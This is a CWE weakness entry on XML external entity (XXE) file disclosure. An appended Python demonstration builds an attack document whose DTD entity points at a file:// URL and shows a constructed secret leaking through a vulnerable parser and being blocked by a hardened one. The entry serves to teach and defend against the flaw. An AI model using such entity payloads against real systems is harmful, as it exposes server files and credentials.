Description
The product processes an XML document that can contain XML entities with URLs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

Extended Description
An XML document may carry a Document Type Definition (DTD), which, among other features, lets the document declare XML entities. An entity can be declared in the document's own (internal) DTD subset with a system identifier: a URL whose content is substituted for every reference to the entity when the document is processed. The attack consists of declaring an entity whose system identifier is a file URL (which, when resolved by the receiving parser, maps to a file on the server), referencing that entity from the body of the document, and submitting the document to the processing application. If the application echoes the substituted data back (for example in an error message), the contents of the file are exposed.

Relationships
ChildOf 538 (views 1000, 699)
ChildOf 673 (view 1000)
ChildOf 610 (view 1000)
ChildOf category 896 (view 888)

Background Details
A URL is not restricted to HTTP schemes. In particular, "file:///c:/winnt/win.ini" designates (on Windows) the file C:\Winnt\win.ini, and in the same way a URL can designate any file on any drive that the parsing process is able to read.

Time of Introduction
Implementation

Common Consequences
Confidentiality: Read application data

Observed Examples
CVE-2005-1306: A browser control can allow remote attackers to determine the existence of files via Javascript containing XML script, aka the "XML External Entity vulnerability."
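The following is an added example, not part of the CWE entry, showing the attack described above end to end with Python's standard xml.sax (expat) parser: a DTD declares an entity whose system identifier is a file URL, the document references it inside an element, and the application returns that element's text, which is exactly what it would echo back to the client. The same document is parsed once with external general entity resolution enabled (the vulnerable configuration) and once with it disabled (the xml.sax default since Python 3.7.1). The secret file, its contents, the element names and the function names are all constructed for the demonstration, and the file URL form assumes a POSIX path.

```python
"""Added example (not from the CWE entry): XML external entity (XXE) file
disclosure with Python's xml.sax/expat, vulnerable vs. hardened parser.

Everything here (file name, secret, element names) is constructed for the demo.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class NameCollector(ContentHandler):
    """Collects the character data inside <name>, i.e. the value the
    application would later reflect to the client (e.g. in an error)."""

    def __init__(self):
        super().__init__()
        self.in_name = False
        self.parts = []

    def startElement(self, tag, attrs):
        self.in_name = (tag == "name")

    def endElement(self, tag):
        if tag == "name":
            self.in_name = False

    def characters(self, data):
        # expat may deliver the entity's text in several chunks
        if self.in_name:
            self.parts.append(data)

    @property
    def text(self):
        return "".join(self.parts)


def build_attack_document(target_path):
    """Attacker's document: the internal DTD subset declares an external
    general entity whose system identifier is a file URL, and the body
    references it so its replacement text lands in <name>."""
    url = "file://" + target_path          # absolute POSIX path -> file:///...
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE user [\n'
        f'  <!ENTITY xxe SYSTEM "{url}">\n'
        ']>\n'
        '<user><name>&xxe;</name></user>\n'
    ).encode()


def extract_name(xml_bytes, resolve_external_entities):
    """Parses untrusted XML and returns the <name> text.

    resolve_external_entities=True  -> vulnerable: expat fetches the system
                                       identifier and substitutes the file.
    resolve_external_entities=False -> hardened (and the default since
                                       Python 3.7.1): the reference is skipped.
    """
    handler = NameCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def demo():
    """Writes a constructed secret file, parses the attack document both
    ways, and returns (secret, leaked_text, hardened_text)."""
    secret = "db_password=hunter2"
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "secret.txt")
        with open(path, "w") as f:
            f.write(secret + "\n")
        doc = build_attack_document(path)
        leaked = extract_name(doc, resolve_external_entities=True)
        hardened = extract_name(doc, resolve_external_entities=False)
    return secret, leaked, hardened


if __name__ == "__main__":
    s, leaked, hardened = demo()
    print("vulnerable parser returned:", repr(leaked.strip()))
    print("hardened parser returned:  ", repr(hardened))
```

The check a reviewer wants is the one the hardened branch makes explicit: external general entity resolution must be off for any parser that sees untrusted XML. Relying on the default is fragile (older Python versions enabled it, and other parsers such as Java's JAXP implementations or lxml with `resolve_entities=True` resolve entities unless told not to), so set the feature explicitly and, where the parser offers it, refuse a DOCTYPE altogether.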
Accessibility

Taxonomy Mappings
43: XML External Entities

Content History
Submission: Anonymous Tool Vendor (under NDA)
Modifications:
2008-07-01 Eric Dalci (Cigital): updated Time_of_Introduction
2008-09-08 CWE Content Team (MITRE): updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings
2010-02-16 CWE Content Team (MITRE): updated Taxonomy_Mappings
2010-09-27 CWE Content Team (MITRE): updated Background_Details, Other_Notes
2011-03-29 CWE Content Team (MITRE): updated Name
2011-06-01 CWE Content Team (MITRE): updated Common_Consequences
2012-05-11 CWE Content Team (MITRE): updated Relationships

Previous Entry Names
Information Leak Through XML External Entity File Disclosure